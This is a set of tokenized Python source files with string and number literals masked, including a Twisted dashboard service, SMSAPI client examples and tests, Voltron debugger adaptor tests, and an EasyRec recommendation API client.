<EOL> """<STR_LIT>""" <EOL> super ( SupplyRequestWhen , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( SupplyRequestWhen , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:code>" , "<STR_LIT:code>" , codeableconcept . CodeableConcept , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , timing . Timing , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import codeableconcept <EOL> from . import fhirdate <EOL> from . import fhirreference <EOL> from . import identifier <EOL> from . import timing </s>
<s> from os . path import join <EOL> from twisted . application . internet import TCPServer <EOL> from twisted . python . log import NullFile <EOL> from twisted . python . util import sibpath <EOL> from twisted . web import server , static <EOL> from smartanthill . dashboard . api import REST <EOL> from smartanthill . log import Logger <EOL> from smartanthill . service import SAMultiService <EOL> class DashboardSite ( server . Site ) : <EOL> def _openLogFile ( self , path ) : <EOL> log = Logger ( "<STR_LIT>" ) <EOL> def wrapper ( msg ) : <EOL> log . debug ( msg . strip ( ) ) <EOL> nf = NullFile ( ) <EOL> nf . write = wrapper <EOL> return nf <EOL> class DashboardService ( SAMultiService ) : <EOL> def __init__ ( self , name , options ) : <EOL> SAMultiService . __init__ ( self , name , options ) <EOL> def startService ( self ) : <EOL> root = static . File ( sibpath ( __file__ , join ( "<STR_LIT>" , "<STR_LIT>" ) ) ) <EOL> root . putChild ( "<STR_LIT>" , REST ( ) ) <EOL> TCPServer ( <EOL> self . options [ '<STR_LIT:port>' ] , <EOL> DashboardSite ( root , logPath = "<STR_LIT>" ) ) . setServiceParent ( self ) <EOL> SAMultiService . startService ( self ) <EOL> def makeService ( name , options ) : <EOL> return DashboardService ( name , options ) </s>
<s> from twisted . python . log import addObserver , removeObserver <EOL> from twisted . trial . unittest import TestCase <EOL> from smartanthill . log import Level , Logger <EOL> class LogCase ( TestCase ) : <EOL> def setUp ( self ) : <EOL> addObserver ( self . _logobserver ) <EOL> self . log = Logger ( "<STR_LIT:test>" ) <EOL> self . _lastlog = None <EOL> def tearDown ( self ) : <EOL> removeObserver ( self . _logobserver ) <EOL> def _logobserver ( self , data ) : <EOL> self . _lastlog = data <EOL> def test_emit ( self ) : <EOL> self . log . set_level ( Level . DEBUG ) <EOL> for l in Level . iterconstants ( ) : <EOL> _lname = l . name . lower ( ) <EOL> try : <EOL> getattr ( self . log , _lname ) ( "<STR_LIT>" , _satraceback = False ) <EOL> except SystemExit : <EOL> self . assertEqual ( l , Level . FATAL ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , "<STR_LIT:test>" if l == Level . INFO <EOL> else "<STR_LIT>" + _lname ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , l ) <EOL> def test_level ( self ) : <EOL> self . log . set_level ( Level . INFO ) <EOL> self . _lastlog = None <EOL> self . log . debug ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog , None ) <EOL> self . log . info ( "<STR_LIT>" , some_param = <NUM_LIT> ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . INFO ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT:message>' ] , ( '<STR_LIT>' , ) ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> self . log . warn ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . WARN ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT:message>' ] , ( '<STR_LIT>' , ) ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:0> ) <EOL> self . log . error ( "<STR_LIT>" ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , Level . ERROR ) <EOL> self . assertEqual ( self . _lastlog [ '<STR_LIT>' ] , <NUM_LIT:1> ) </s>
<s> from chatto_transform . datastores . appendable_datastore import AppendableHdfDataStore <EOL> from chatto_transform . schema . mimic . mimic_schema import chartevents_schema <EOL> from chatto_transform . config import mimic_config <EOL> from pandas . io . pytables import Term <EOL> import pandas as pd <EOL> import os . path <EOL> EXPECTED_ROWS = <NUM_LIT> <EOL> class CharteventsDataStore ( AppendableHdfDataStore ) : <EOL> def __init__ ( self ) : <EOL> super ( ) . __init__ ( chartevents_schema , mimic_config . local_storage_dir + '<STR_LIT>' , expected_rows = EXPECTED_ROWS ) <EOL> def _get_data_columns ( self ) : <EOL> return chartevents_schema . col_names ( ) <EOL> def select ( self , where ) : <EOL> store = self . _get_store ( ) <EOL> df = store . select ( '<STR_LIT>' , where = where , autoclose = True ) <EOL> for col in self . _categorical_cols ( ) : <EOL> if self . _any_categories ( col ) : <EOL> print ( '<STR_LIT>' , col ) <EOL> categories = self . _load_categories ( col ) <EOL> else : <EOL> categories = [ ] <EOL> df [ col ] = pd . Categorical . from_codes ( df [ col ] , categories = categories , name = col ) <EOL> df = self . _rename_df_from_hdf ( df ) <EOL> return df </s>
<s> __author__ = '<STR_LIT>' <EOL> import threading <EOL> import time <EOL> class debug ( object ) : <EOL> @ staticmethod <EOL> def no_return ( originalFunction , * args , ** kwargs ) : <EOL> def callNoReturn ( * args , ** kwargs ) : <EOL> originalFunction ( * args , ** kwargs ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> return callNoReturn <EOL> MINUTE = <NUM_LIT> <EOL> HOUR = <NUM_LIT> * MINUTE <EOL> INFINITE = <NUM_LIT:0> <EOL> class cached_property ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ttl = <NUM_LIT> ) : <EOL> self . ttl = ttl <EOL> def __call__ ( self , fget , doc = None ) : <EOL> self . fget = fget <EOL> self . __doc__ = doc or fget . __doc__ <EOL> self . __name__ = fget . __name__ <EOL> self . __module__ = fget . __module__ <EOL> return self <EOL> def __get__ ( self , inst , owner ) : <EOL> now = time . time ( ) <EOL> try : <EOL> value , last_update = inst . _cache [ self . __name__ ] <EOL> if now - last_update > self . ttl > <NUM_LIT:0> : <EOL> raise AttributeError <EOL> except ( KeyError , AttributeError ) : <EOL> value = self . fget ( inst ) <EOL> try : <EOL> cache = inst . _cache <EOL> except AttributeError : <EOL> cache = inst . _cache = { } <EOL> cache [ self . __name__ ] = ( value , now ) <EOL> return value <EOL> class Singleton : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , decorated ) : <EOL> self . _lock = threading . Lock ( ) <EOL> self . _decorated = decorated <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> with self . _lock : <EOL> try : <EOL> return self . _instance <EOL> except AttributeError : <EOL> self . _instance = self . _decorated ( * args , ** kwargs ) <EOL> return self . _instance <EOL> def __instancecheck__ ( self , inst ) : <EOL> return isinstance ( inst , self . _decorated ) </s>
<s> from smsapi . client import SmsAPI <EOL> api = SmsAPI ( ) <EOL> api . set_username ( '<STR_LIT>' ) <EOL> api . set_password ( '<STR_LIT>' ) <EOL> api . service ( '<STR_LIT>' ) . action ( '<STR_LIT>' ) <EOL> api . set_content ( '<STR_LIT>' ) <EOL> api . set_to ( '<STR_LIT>' ) <EOL> result = api . execute ( ) <EOL> for r in result : <EOL> print ( r . id , r . points , r . status ) </s>
<s> import time <EOL> import unittest <EOL> from tests import SmsApiTestCase , PHONE_NUMBER , SEND_DELAY <EOL> from smsapi . responses import ApiResponse <EOL> class ServiceSmsTestCase ( SmsApiTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ServiceSmsTestCase , self ) . setUp ( ) <EOL> self . api . service ( '<STR_LIT>' ) <EOL> self . message_params = { <EOL> '<STR_LIT:content>' : '<STR_LIT>' , <EOL> '<STR_LIT:to>' : PHONE_NUMBER , <EOL> '<STR_LIT:date>' : time . time ( ) + SEND_DELAY <EOL> } <EOL> self . message_id = None <EOL> def test_send ( self ) : <EOL> self . api . action ( '<STR_LIT>' , self . message_params ) <EOL> response = self . api . execute ( ) <EOL> self . message_id = response . id <EOL> self . assertIsInstance ( response , ApiResponse ) <EOL> self . assertIsNotNone ( response . id ) <EOL> def test_delete ( self ) : <EOL> self . api . action ( '<STR_LIT>' , self . message_params ) <EOL> send_response = self . api . execute ( ) <EOL> self . api . action ( '<STR_LIT>' , { '<STR_LIT:id>' : send_response . id } ) <EOL> delete_response = self . api . execute ( ) <EOL> self . assertEqual ( send_response . id , delete_response . id ) <EOL> self . assertIsInstance ( delete_response , ApiResponse ) <EOL> def test_get ( self ) : <EOL> self . api . action ( '<STR_LIT>' , self . message_params ) <EOL> send_response = self . api . execute ( ) <EOL> self . message_id = send_response . id <EOL> self . api . action ( '<STR_LIT>' , { '<STR_LIT:id>' : send_response . id } ) <EOL> get_response = self . api . execute ( ) <EOL> self . assertEqual ( send_response . id , get_response . id ) <EOL> self . assertIsInstance ( get_response , ApiResponse ) <EOL> def tearDown ( self ) : <EOL> if self . message_id : <EOL> self . api . action ( '<STR_LIT>' , { '<STR_LIT:id>' : self . message_id } ) <EOL> self . api . execute ( ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( ServiceSmsTestCase ) ) <EOL> return suite </s>
<s> """<STR_LIT>""" <EOL> import tempfile <EOL> import sys <EOL> import json <EOL> import time <EOL> import logging <EOL> import subprocess <EOL> import threading <EOL> from mock import Mock <EOL> from nose . tools import * <EOL> import voltron <EOL> from voltron . core import * <EOL> from voltron . api import * <EOL> from voltron . plugin import PluginManager , DebuggerAdaptorPlugin <EOL> import platform <EOL> if platform . system ( ) == '<STR_LIT>' : <EOL> sys . path . append ( "<STR_LIT>" ) <EOL> try : <EOL> import lldb <EOL> from common import * <EOL> voltron . setup_env ( ) <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> def setup ( ) : <EOL> global adaptor , dbg , target <EOL> log . info ( "<STR_LIT>" ) <EOL> pm = PluginManager ( ) <EOL> plugin = pm . debugger_plugin_for_host ( '<STR_LIT>' ) <EOL> adaptor = plugin . adaptor_class ( ) <EOL> subprocess . call ( "<STR_LIT>" , shell = True ) <EOL> target = adaptor . host . CreateTargetWithFileAndArch ( "<STR_LIT>" , lldb . LLDB_ARCH_DEFAULT ) <EOL> main_bp = target . BreakpointCreateByName ( "<STR_LIT>" , target . GetExecutable ( ) . GetFilename ( ) ) <EOL> def teardown ( ) : <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def test_version ( ) : <EOL> assert '<STR_LIT>' in adaptor . version ( ) <EOL> def test_state_invalid ( ) : <EOL> try : <EOL> adaptor . state ( ) <EOL> exception = False <EOL> except NoSuchTargetException : <EOL> exception = True <EOL> except : <EOL> exception = False <EOL> assert exception <EOL> def test_targets_not_running ( ) : <EOL> t = adaptor . targets ( ) [ <NUM_LIT:0> ] <EOL> assert t [ "<STR_LIT:state>" ] == "<STR_LIT>" <EOL> assert t [ "<STR_LIT>" ] == "<STR_LIT>" <EOL> assert t [ "<STR_LIT:id>" ] == <NUM_LIT:0> <EOL> assert len ( t [ "<STR_LIT:file>" ] ) > <NUM_LIT:0> <EOL> assert '<STR_LIT>' in t [ "<STR_LIT:file>" ] <EOL> def test_targets_stopped ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> t = adaptor . targets ( ) [ <NUM_LIT:0> ] <EOL> assert t [ "<STR_LIT:state>" ] == "<STR_LIT>" <EOL> process . Destroy ( ) <EOL> def test_registers ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> regs = adaptor . registers ( ) <EOL> assert regs is not None <EOL> assert len ( regs ) > <NUM_LIT:0> <EOL> assert regs [ '<STR_LIT>' ] != <NUM_LIT:0> <EOL> process . Destroy ( ) <EOL> def test_stack_pointer ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> sp = adaptor . stack_pointer ( ) <EOL> assert sp != <NUM_LIT:0> <EOL> process . Destroy ( ) <EOL> def test_program_counter ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> pc_name , pc = adaptor . program_counter ( ) <EOL> assert pc != <NUM_LIT:0> <EOL> process . Destroy ( ) <EOL> def test_memory ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> regs = adaptor . registers ( ) <EOL> mem = adaptor . memory ( address = regs [ '<STR_LIT>' ] , length = <NUM_LIT> ) <EOL> assert len ( mem ) == <NUM_LIT> <EOL> process . Destroy ( ) <EOL> def test_stack ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> stack = adaptor . stack ( length = <NUM_LIT> ) <EOL> assert len ( stack ) == <NUM_LIT> <EOL> process . Destroy ( ) <EOL> def test_disassemble ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> output = adaptor . disassemble ( count = <NUM_LIT> ) <EOL> assert len ( output ) > <NUM_LIT:0> <EOL> process . Destroy ( ) <EOL> def test_command ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> output = adaptor . command ( "<STR_LIT>" ) <EOL> assert len ( output ) > <NUM_LIT:0> <EOL> assert '<STR_LIT>' in output <EOL> process . Destroy ( ) <EOL> def test_dereference_main ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> regs = adaptor . registers ( ) <EOL> output = adaptor . dereference ( regs [ '<STR_LIT>' ] ) <EOL> assert ( '<STR_LIT>' , '<STR_LIT>' ) in output <EOL> process . Destroy ( ) <EOL> def test_dereference_rsp ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> regs = adaptor . registers ( ) <EOL> output = adaptor . dereference ( regs [ '<STR_LIT>' ] ) <EOL> assert ( '<STR_LIT>' , '<STR_LIT>' ) in output <EOL> process . Destroy ( ) <EOL> def test_dereference_string ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> regs = adaptor . registers ( ) <EOL> output = adaptor . dereference ( regs [ '<STR_LIT>' ] + <NUM_LIT> ) <EOL> assert '<STR_LIT>' in list ( output [ - <NUM_LIT:1> ] ) [ - <NUM_LIT:1> ] <EOL> process . Destroy ( ) <EOL> def test_breakpoints ( ) : <EOL> process = target . LaunchSimple ( None , None , os . getcwd ( ) ) <EOL> bps = adaptor . breakpoints ( ) <EOL> assert len ( bps ) == <NUM_LIT:1> <EOL> assert bps [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == False <EOL> assert bps [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> assert bps [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] == <NUM_LIT:1> <EOL> assert bps [ <NUM_LIT:0> ] [ '<STR_LIT>' ] > <NUM_LIT:0> <EOL> assert bps [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] == "<STR_LIT>" <EOL> process . Destroy ( ) <EOL> def test_capabilities ( ) : <EOL> assert adaptor . capabilities ( ) == [ '<STR_LIT>' ] <EOL> except : <EOL> print ( "<STR_LIT>" ) </s>
<s> import logging <EOL> from voltron . view import * <EOL> from voltron . plugin import * <EOL> from voltron . api import * <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class BacktraceView ( TerminalView ) : <EOL> def render ( self ) : <EOL> height , width = self . window_size ( ) <EOL> self . title = '<STR_LIT>' <EOL> res = self . client . perform_request ( '<STR_LIT>' , block = self . block , command = '<STR_LIT>' ) <EOL> if res . timed_out : <EOL> return <EOL> if res and res . is_success : <EOL> self . body = res . output <EOL> else : <EOL> log . error ( "<STR_LIT>" . format ( res . message ) ) <EOL> self . body = self . colour ( res . message , '<STR_LIT>' ) <EOL> super ( BacktraceView , self ) . render ( ) <EOL> class BacktraceViewPlugin ( ViewPlugin ) : <EOL> plugin_type = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> aliases = ( '<STR_LIT:t>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> view_class = BacktraceView </s>
<s> import requests <EOL> from django . db . models import get_model <EOL> from . errors import EasyRecException <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> TIME_RANGE_DAY = '<STR_LIT>' <EOL> TIME_RANGE_WEEK = '<STR_LIT>' <EOL> TIME_RANGE_MONTH = '<STR_LIT>' <EOL> TIME_RANGE_ALL = '<STR_LIT>' <EOL> TIME_RANGES = ( <EOL> TIME_RANGE_DAY , <EOL> TIME_RANGE_WEEK , <EOL> TIME_RANGE_MONTH , <EOL> TIME_RANGE_ALL <EOL> ) <EOL> class EasyRec ( object ) : <EOL> _base_url = "<STR_LIT>" <EOL> _default_item_type = '<STR_LIT>' <EOL> _default_time_range = TIME_RANGE_ALL <EOL> def __init__ ( self , endpoint , tenant , api_key ) : <EOL> if not endpoint . startswith ( '<STR_LIT:http>' ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> if endpoint . endswith ( "<STR_LIT:/>" ) : <EOL> endpoint = endpoint [ : - <NUM_LIT:1> ] <EOL> self . _endpoint = "<STR_LIT:/>" . join ( ( endpoint , self . _base_url ) ) <EOL> self . _tenant = tenant <EOL> self . _api_key = api_key <EOL> self . _requests = requests <EOL> def add_view ( self , session_id , item_id , item_desc , item_url , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def add_buy ( self , session_id , item_id , item_desc , item_url , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def add_rating ( self , session_id , item_id , item_desc , item_url , rating , <EOL> item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) , <EOL> '<STR_LIT>' : rating , <EOL> } <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def add_action ( self , session_id , item_id , item_desc , item_url , action , <EOL> value = None , item_type = '<STR_LIT>' , user_id = None , image_url = None , <EOL> action_time = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : session_id , <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : item_desc , <EOL> '<STR_LIT>' : item_url , <EOL> '<STR_LIT>' : self . _get_item_type ( item_type ) , <EOL> '<STR_LIT>' : action , <EOL> } <EOL> if value : <EOL> options [ '<STR_LIT>' ] = value <EOL> if user_id : <EOL> options [ '<STR_LIT>' ] = user_id <EOL> if image_url : <EOL> options [ '<STR_LIT>' ] = image_url <EOL> if action_time : <EOL> options [ '<STR_LIT>' ] = action_time . strftime ( "<STR_LIT>" ) <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> return self . _fetch_response ( url , params = options ) <EOL> def get_user_recommendations ( self , user_id , max_results = None , <EOL> requested_item_type = None , action_type = None ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : user_id <EOL> } <EOL> if max_results : <EOL> options [ '<STR_LIT>' ] = max_results <EOL> if requested_item_type : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( requested_item_type ) <EOL> if action_type : <EOL> options [ '<STR_LIT>' ] = action_type <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_other_users_also_bought ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_other_users_also_viewed ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_items_rated_as_good_by_other_users ( self , item_id , user_id = None , <EOL> max_results = None , item_type = None , requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : user_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : item_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , <EOL> ** kwargs ) <EOL> def get_related_items ( self , item_id , max_results = None , assoc_type = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : item_id , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : assoc_type , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_item_based_recommendation ( '<STR_LIT>' , ** kwargs ) <EOL> def _get_item_based_recommendation ( self , recommendation_type , ** kwargs ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> } <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( kwargs [ '<STR_LIT>' ] ) <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> url = self . _build_url ( recommendation_type ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_most_viewed_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_most_bought_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_most_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_best_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def get_worst_rated_items ( self , time_range = None , max_results = None , <EOL> requested_item_type = None ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : time_range , <EOL> '<STR_LIT>' : max_results , <EOL> '<STR_LIT>' : requested_item_type <EOL> } <EOL> return self . _get_community_rankings ( '<STR_LIT>' , ** kwargs ) <EOL> def _get_community_rankings ( self , ranking_type , ** kwargs ) : <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant , <EOL> } <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_item_type ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> if kwargs . get ( '<STR_LIT>' ) : <EOL> options [ '<STR_LIT>' ] = self . _get_time_range ( <EOL> kwargs [ '<STR_LIT>' ] <EOL> ) <EOL> url = self . _build_url ( ranking_type ) <EOL> recommendations = self . _fetch_response ( url , params = options ) <EOL> return self . _recommendations_to_products ( recommendations ) <EOL> def get_item_types ( self ) : <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> return self . _item_types <EOL> url = self . _build_url ( '<STR_LIT>' ) <EOL> options = { <EOL> '<STR_LIT>' : self . _api_key , <EOL> '<STR_LIT>' : self . _tenant <EOL> } <EOL> try : <EOL> response = self . _fetch_response ( url , params = options ) <EOL> except : <EOL> return [ '<STR_LIT>' , ] <EOL> try : <EOL> self . _item_types = response [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> return self . _item_types <EOL> except KeyError : <EOL> return [ '<STR_LIT>' , ] <EOL> def _get_item_type ( self , item_type ) : <EOL> item_type = item_type . upper ( ) <EOL> if item_type in self . get_item_types ( ) : <EOL> return item_type <EOL> return self . _default_item_type <EOL> def _get_time_range ( self , time_range ) : <EOL> time_range = time_range . upper ( ) <EOL> if time_range in TIME_RANGES : <EOL> return time_range <EOL> return self . _default_time_range <EOL> def _build_url ( self , path ) : <EOL> if path . startswith ( '<STR_LIT:/>' ) : <EOL> path = path [ <NUM_LIT:1> : ] <EOL> if path . endswith ( '<STR_LIT:/>' ) : <EOL> path = path [ : - <NUM_LIT:1> ] <EOL> url = "<STR_LIT>" % ( self . _endpoint , path ) <EOL> return url <EOL> def _fetch_response ( self , url , method = "<STR_LIT:GET>" , params = None ) : <EOL> func = { <EOL> '<STR_LIT:GET>' : self . _requests . get , <EOL> '<STR_LIT:POST>' : self . _requests . post <EOL> } . get ( method , self . _requests . get ) <EOL> logger . debug ( "<STR_LIT>" % ( method , url , params ) ) <EOL> response = func ( url , params = params ) <EOL> logger . debug ( "<STR_LIT>" % ( <EOL> response . status_code , <EOL> response . text <EOL> ) ) <EOL> response . raise_for_status ( ) <EOL> content = response . json ( ) <EOL> self . check_response_for_errors ( content ) <EOL> return content <EOL> def _recommendations_to_products ( self , recommendations ) : <EOL> recommendeditems = recommendations . get ( '<STR_LIT>' ) <EOL> if not recommendeditems : <EOL> return [ ] <EOL> items = recommendeditems . get ( '<STR_LIT>' ) <EOL> if not items : <EOL> return [ ] <EOL> if "<STR_LIT:id>" in items : <EOL> items = [ items ] <EOL> url_map = { } <EOL> upcs = [ ] <EOL> for item in items : <EOL> upc = item . get ( '<STR_LIT:id>' ) <EOL> upcs . append ( upc ) <EOL> url_map [ upc ] = item . get ( '<STR_LIT:url>' ) <EOL> Product = get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> products = Product . browsable . filter ( upc__in = upcs ) <EOL> results = [ ] <EOL> for product in products : <EOL> results . append ( { <EOL> "<STR_LIT>" : product , <EOL> "<STR_LIT>" : url_map . get ( product . upc ) <EOL> } ) <EOL> return results <EOL> def check_response_for_errors ( self , json ) : <EOL> if json . get ( '<STR_LIT:error>' , False ) : <EOL> raise EasyRecException ( json [ '<STR_LIT:error>' ] ) <EOL> class DummyResponse ( object ) : <EOL> def __init__ ( self , response = { } ) : <EOL> self . response = response <EOL> def json ( self ) : <EOL> return self . response <EOL> def raise_for_status ( self ) : <EOL> pass 